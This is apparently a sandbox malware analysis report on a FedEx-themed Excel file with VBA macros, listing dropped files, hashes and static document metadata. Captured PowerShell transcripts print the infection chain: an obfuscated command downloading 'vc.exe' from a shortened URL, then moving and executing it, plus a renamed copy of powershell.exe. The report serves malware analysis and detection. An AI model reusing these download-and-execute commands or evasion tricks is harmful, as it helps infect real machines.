                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoqj34sn.4ye.ps1
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\powershell.exe
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):430592
                                                                                                                                                                                                                            Entropy (8bit):5.4944920581701515
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:kaEYqWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqOI:kJW2KXzJ4pdd3klnnWosPhnzq9
                                                                                                                                                                                                                            MD5:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            SHA1:F66A592D23067C6EFF15356F874E5B61EA4DF4B5
                                                                                                                                                                                                                            SHA-256:E0C662D10B852B23F2D8A240AFC82A72B099519FA71CDDF9D5D0F0BE08169B6E
                                                                                                                                                                                                                            SHA-512:E447F10E021EEF6C6629962B2EB2148F7073828F4CE2FC1C7FBAD67C300C38EBF022E960CE6BD4AC856A66958B02E00458589CFB5CF0CB87641F33B9FF349B81
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: docCGLRRT67L45F205V.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: docBRTNMR51L69G006Q.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03141330161.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_04198100168.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03675480267.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_02044200042.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_TMSRLL61M43B796B.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_BRNLSN65H44H501N.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03587420286.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_03455910780.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_01555200441.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_07501560150.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_01578300210.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: sload.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: sload (2).vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato_doc_02298410644.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Allegato.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Fatt_cliente_02567110412.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: FattDiffEmessa2020 VNZMSM75H27B201Q.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: FattDiffEmessa2020 01170200339.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4..OU.OU.OU.Q.z.MU.F-z.EU. 1.KU. 1.TU.OU..U. 1.JU. 1.EU. 1.GU. 1..NU. 1.NU.RichOU.........................PE..L...N2..............................0.............@.................................; ....@...... ................................... ...}......................@....4..T...................x........................................................text............................... ..`.data...............................@....idata..............................@..@.rsrc....}... ...~..................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1099008FEDEX_090887766.xls.LNK
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=75776, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                                                                            Entropy (8bit):4.653149370351365
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:8TqMPjgSFdeGAKWDbwDI77aB6myTqMPjgSFdeGAKWDbwDI77aB6m:8/j9eKWZiB6p/j9eKWZiB6
                                                                                                                                                                                                                            MD5:257A2CFEB1B38BBC1DB25FF8CD24DE08
                                                                                                                                                                                                                            SHA1:F4374A08219445E6BB7FEFD8E56522E4579F25F5
                                                                                                                                                                                                                            SHA-256:ADBE040933A4860F078E0B7CBCB889593CDB09B6D4233A1B051B98092D412809
                                                                                                                                                                                                                            SHA-512:7AB3E6704E4084ACDB945B5527D7CA6C092F935EE3190F62BE0255B2016B1F73C89D0478B9D2E685A2C82245FBF861AE4CDB5701A523BA062723BF57873A3ED2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview: L..................F.... .......:...&2.....&2......(...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny.sQ......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....sQ. .109900~1.XLS..f......>QwxsQ.....h.....................6#..1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.......`...............-......._...........>.S......C:\Users\user\Desktop\1099008FEDEX_090887766.xls..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=8192, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):904
                                                                                                                                                                                                                            Entropy (8bit):4.634674450896397
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:8hBtCXUYcuElPCH2YgSFiYpGuruvA+WrjAZ/2bDkLLC5Lu4t2Y+xIBjKZm:8hLMjgSFnluSAZiDf87aB6m
                                                                                                                                                                                                                            MD5:24176C58F48FAA7E3A1037B8FFA6AC81
                                                                                                                                                                                                                            SHA1:51592224CA2CB4403FBFD7830849A46F02134DE2
                                                                                                                                                                                                                            SHA-256:524A8BFE7E1FBFA1A12BDBA4C1A3F6469264A851F11C2BB95FD93CA154863AE9
                                                                                                                                                                                                                            SHA-512:0AF14CD0469BA54CE179D46BAB642CC8B1FE56E81E0B784EDD34E67F75479D9CD16F4C668B9AFA0E0A94785FADD04DD48EF394F01838A0061316933E80E5C37F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: L..................F........N....-..P......&2...... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....sQ....Desktop.h.......Ny.sQ.......Y..............>.......%.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):131
                                                                                                                                                                                                                            Entropy (8bit):4.463054770855908
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:oyBVomMMRVGSjiLp2iVGSjiLp2mMMRVGSjiLp2v:dj6i0SjiL90SjiLmi0SjiL2
                                                                                                                                                                                                                            MD5:4B6A6073479788E47CDB2B9541380A2F
                                                                                                                                                                                                                            SHA1:5F4C24C163B47F613D1CF2110404D0385FE052A5
                                                                                                                                                                                                                            SHA-256:9D62BB83F98C890CA7832BDBA451BC0CB70592BF808C237D242BAD0C78A5B0D0
                                                                                                                                                                                                                            SHA-512:482944537A4B9D2F26079DD9E4B6CDDFFC70EAE1DD8AB15134BED8D591E457CC3D705E4932B15771CA686DDA5B424B4ED510819D736AEAE6F1A0948E486F1C44
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..1099008FEDEX_090887766.xls.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..
                                                                                                                                                                                                                            C:\Users\user\Desktop\61B10000
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):84328
                                                                                                                                                                                                                            Entropy (8bit):6.645197213312611
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:UXk3hbdlylKsgqopeJBWhZFGkE+cL2NdHmSb4wIE7zp0RhBv1hQz7rTr1+Xk3hbb:UXk3hbdlylKsgqopeJBWhZFGkE+cL2Nh
                                                                                                                                                                                                                            MD5:46039BBAC81FE8A1BFF4B381C0C786DE
                                                                                                                                                                                                                            SHA1:58F5D20336F1CE10EEB65D5013D3ED9E409CE5E2
                                                                                                                                                                                                                            SHA-256:A581FB978232CA6058F329C12ACB257BC057EBF9A3F7055C2E2AE1E6DCB82FFF
                                                                                                                                                                                                                            SHA-512:BA5904CE84626F73264A0248F02A867159CBF30B4AFA5C13E4DD75C3150113ABFF6DEFAF5BADE03247E5AD891E96A416C67AC57B0104760ABA45BAA3580853A1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: ........T8..........................\.p....pratesh B.....a.........=...........................................=...h...\:.#8.......X.@...........".......................1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.
                                                                                                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.367706.GhCrZJKN.20201119093157.txt
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1006
                                                                                                                                                                                                                            Entropy (8bit):5.083836944037601
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:BxSAwxvBnJx2DOXJKGWqHjeTKKjX4CIym1ZJX7RnxSAZsvi:BZ0vhJoOZKBqqDYB1ZhlZZOi
                                                                                                                                                                                                                            MD5:CE59AFD079451DE08DDAD5E35524608F
                                                                                                                                                                                                                            SHA1:EBCE20B643E0715B34E77D44D9C9FD92132910A4
                                                                                                                                                                                                                            SHA-256:4E72B7C346016DB061C0827C1C14CB3373B47831223EF2A8BF25A39E9571C84F
                                                                                                                                                                                                                            SHA-512:90685286DA43ED84A048F7262C69ADDA07C4BE88A3C7A075F4CFB36119F8AB66FD58DDF4A5ABBA1A49BE89FAF36C30B72BF4DDDD1313917010E2CCC9DEE58C43
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093217..**********************..PS>Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..**********************..Command start time: 20201119093253..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201119093255..******************
                                                                                                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.367706.MJQ4zjyk.20201119093157.txt
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1062
                                                                                                                                                                                                                            Entropy (8bit):5.264034064136681
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:BxSAlxvBnJx2DOXJE3eWJHjeTKKjX4CIym1ZJX630nxSAZt:BZ3vhJoOZEZJqDYB1Z4yZZt
                                                                                                                                                                                                                            MD5:FEDB7E147DA31DEC575AA72B3F5E764A
                                                                                                                                                                                                                            SHA1:058A79F3FCCFB5FE04DA860228CFE60587387A76
                                                                                                                                                                                                                            SHA-256:FE36D4C1CDB475167B2B6A33D95272B3C23ABFB78FAFDC6943AD5A1244EA05D6
                                                                                                                                                                                                                            SHA-512:44680064BD9772A99AD65452B74E887F985B8A74C718EB5DC210E1BD68C3D1833975F40F44C1BAC3C7C9832FF847E4853E79FAEE17871DB9E52A78B3E9658890
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093218..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093218..**********************..PS>(New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..**********************..Command start time: 20201119093252..**********************..PS>$global:?..True..**********************..Windows PowerShell tran
                                                                                                                                                                                                                            C:\Users\user\Documents\20201119\PowerShell_transcript.367706.cMeZeq7v.20201119093201.txt
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):976
                                                                                                                                                                                                                            Entropy (8bit):5.078856042808288
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:BxSA/xvBnJx2DOXJ1WwHjeTKKjX4CIym1ZJXOYnxSAZR:BZ5vhJoOZcwqDYB1ZZZZR
                                                                                                                                                                                                                            MD5:497DFCBBAB62DC2B128C53730CBFAA00
                                                                                                                                                                                                                            SHA1:794D4D7D8A68EDC09310B411C57FA31754B82157
                                                                                                                                                                                                                            SHA-256:EC6930783B823A6900FA7298A5B0975E3834773C204FD3A200699A5529CBE57B
                                                                                                                                                                                                                            SHA-512:9FE32BB7D50912DAE701641EEE1CDD17D115CD17FA488F0B0EE1DD7E505E56C4F8470F0A4153718053C845C424E8BC040E9B2157D73CCB1E7BCB6453D85D568A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201119093223..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;..Process ID: 1560..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201119093224..**********************..PS>Start-Sleep 12; cd $env:appdata; ./vc.exe;..**********************..Command start time: 20201119093305..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20201119093305..**********************..
                                                                                                                                                                                                                            C:\Users\user\Documents\vc.exe
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):160312
                                                                                                                                                                                                                            Entropy (8bit):7.6582344259708695
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:XYhVzakz10URbezAqQF2XcPmSsu/SmwhZ7jL/qz8/kLAQkR5K:iVVRbezcoXeT/wL7jLixzUK
                                                                                                                                                                                                                            MD5:BB7C0DFD8ECC7EEBCE937A232608695F
                                                                                                                                                                                                                            SHA1:1CCC1FB00E7550C3E0A531E2C0516B741BD26F77
                                                                                                                                                                                                                            SHA-256:BE901CFEF8FFF5E7E61DEBEB870EB86D93E84CD458E34D661BC7B0C1103D93BF
                                                                                                                                                                                                                            SHA-512:DF6F2AAB574B766CD9AC6FEA092DF79E667B731C8C4CAC34127294C7EBD50CCC9E66F0ECDDBEA0B5BC9A4BCD1999035484C8A30259948AE08BC76B9BB2B23EC3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.._.................H...........f... ........@.. ....................................@..................................f..J....................T..8............................................................ ............... ..H............text....F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H...........T>......@....+...:..........................................N+.+.*(....+.(....+.6.(.....(....*..>+.+.*.+.(....+..0..]........,*+)+*.,..,+&++,. .f.+%+*.-.+,&.,.+-{....+)*.+.(....+..+..+.(U...+.(....+.(....+..+.o....+.....0..v........-.+:.+>,. ..f.+<+A&.-.*+A+B .f.+B .....+A+B.o....}.....-..-.*(....+.(....+.(U...+.(....+..+.(....+.(U...+..+.(....+....0..I........-.+',.+&{....,.+ {....+..,..,.+.+..,.&&.-.*.+..+..+.o....+..+..+.(....+.....~....*..+......*.+...(....*
                                                                                                                                                                                                                            \Device\ConDrv
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                            Entropy (8bit):5.024065535765779
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:ohpj8WXp+N23fInNq2JS2KFfFjdpp5TpjInn:oTjlAn5KFf/bTjInn
                                                                                                                                                                                                                            MD5:FB1FEB60AF5F4BAEEF6DE01B2C04447E
                                                                                                                                                                                                                            SHA1:D8DBF120E2871F1661A7BA3F591C2E85724BC010
                                                                                                                                                                                                                            SHA-256:7D7DBAFF7CE525336918841033AB6E6F9C5B1DAA04620377ECEE5A7488C83D90
                                                                                                                                                                                                                            SHA-512:F636F9B05B6B209AE567680FCDD6628C2CC747C93BBBBBA2E405CAE7B8D7EEFDDB7A5B1D68B611EA7267FB8904861B17E356F640A95BDF6D39B78986A1D6F45B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview: C:\Windows\system32\WindowsPowerShell\v1.0\C:\Users\user\AppData\Local\Temp\powershell.exe/DCOPY:DA /COPY:DAT /Z /MT:8 /R:1000000 /W:30 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Oct 11 00:50:35 2020, Security: 1
                                                                                                                                                                                                                            Entropy (8bit):6.7883643858765215
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                            File name:1099008FEDEX_090887766.xls
                                                                                                                                                                                                                            File size:68608
                                                                                                                                                                                                                            MD5:069451376c805d4b4d21fdc34a5e58ba
                                                                                                                                                                                                                            SHA1:5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
                                                                                                                                                                                                                            SHA256:dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
                                                                                                                                                                                                                            SHA512:b05d54fb806cfa391e78871328659319824481dcf522a8a1a18067c6c702460fb8650dd603f8d91e1123ef9836406c2fdddc48f38048c8ca1da6a77983f750ec
                                                                                                                                                                                                                            SSDEEP:1536:eknSGiysRchNXHfA1MiWhZFGkEld+Dr7e7mSb4wIE7zp0RhBv1hQz7rT01R:eknSGiysRchNXHfA1MiWhZFGkEld+Drj
                                                                                                                                                                                                                            File Content Preview:........................;......................................................................................................................................................................................................................................

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Document Type:OLE
                                                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                                                            OLE File "1099008FEDEX_090887766.xls"

                                                                                                                                                                                                                            Indicators

                                                                                                                                                                                                                            Has Summary Info:True
                                                                                                                                                                                                                            Application Name:unknown
                                                                                                                                                                                                                            Encrypted Document:False
                                                                                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                                                                                            Summary

                                                                                                                                                                                                                            Code Page:1252
                                                                                                                                                                                                                            Last Saved By:Alexis UZAN
                                                                                                                                                                                                                            Create Time:2020-09-20 21:17:44
                                                                                                                                                                                                                            Last Saved Time:2020-10-10 23:50:35
                                                                                                                                                                                                                            Security:1

                                                                                                                                                                                                                            Document Summary

                                                                                                                                                                                                                            Document Code Page:1252
                                                                                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                                                                                            Shared Document:False
                                                                                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                                                                                            Application Version:1048576

                                                                                                                                                                                                                            Streams

                                                                                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                                                                                                                                                                                            General
                                                                                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Stream Size:276
                                                                                                                                                                                                                            Entropy:3.16930549839
                                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                                                                                                                                                                                            General
                                                                                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Stream Size:156
                                                                                                                                                                                                                            Entropy:3.42617386685
                                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . A l e x i s U Z A N . @ . . . . L . z . . . . @ . . . . . . % ` . . . . . . . . . . .
